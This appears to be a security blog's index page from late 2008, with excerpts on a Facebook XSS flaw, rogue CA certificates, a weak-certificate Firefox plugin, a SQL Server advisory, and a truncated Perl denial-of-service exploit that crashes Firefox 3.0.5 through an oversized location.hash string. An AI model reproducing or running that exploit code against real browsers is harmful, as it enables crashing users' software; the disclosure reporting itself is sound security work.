Saturday, January 3rd, 2009
DaiMon has once more discovered a new critical cross-site scripting vulnerability which affects the Facebook "Reset Password" page. Malicious users can inject code to phish credentials and other sensitive personal information from millions of Facebook members.
We hope that this serious flaw gets fixed quickly as is usually the case with ...
Posted in Coding, Internet, Privacy, Security | 3 Comments
Friday, January 2nd, 2009
This Firefox plugin was first created during the Debian/OpenSSL scare about 6 months ago, when key pairs generated on an affected machine were easily guessable. Marton Anka created this plugin to help users find these bad certificates:
On 12/31/2008, Marton updated this plugin to detect the ...
Posted in Coding, Internet, Privacy, Security | 1 Comment
Tuesday, December 30th, 2008
We have identified a vulnerability in the Internet Public Key Infrastructure (PKI) used to issue digital certificates for secure websites. As a proof of concept we executed a practical attack scenario and successfully created a rogue Certification Authority (CA) certificate trusted ...
Posted in Internet, Privacy, Security | No Comments
Tuesday, December 23rd, 2008
#!/usr/bin/perl
# mzff_lhash_dos.pl
# Mozilla Firefox 3.0.5 location.hash Denial of Service Exploit
# Jeremy Brown [[email protected]/jbrownsec.blogspot.com]
# Crash on Vista, play with it on XP
$filename = $ARGV[0];
if(!defined($filename))
{
print "Usage: $0 <filename.html>\n\n";
}
$head = "<html>" . "\n" . "<script type=\"text/javascript\">" . "\n";
$trig = "location.hash = \"" . "A" x 20000000 . "\";" ...
Posted in Coding, Internet, Security | No Comments
Monday, December 22nd, 2008
Microsoft late Monday issued a pre-patch advisory confirming a remote code execution vulnerability affecting its SQL Server line.
The vulnerability, publicly disclosed with exploit code more than two weeks ago, affects Microsoft SQL Server 2000, Microsoft SQL Server 2005, Microsoft SQL Server 2005 Express Edition, Microsoft SQL Server 2000 Desktop Engine ...
Posted in Coding, Internet, Networking, Privacy, Security, Software, Windows | No Comments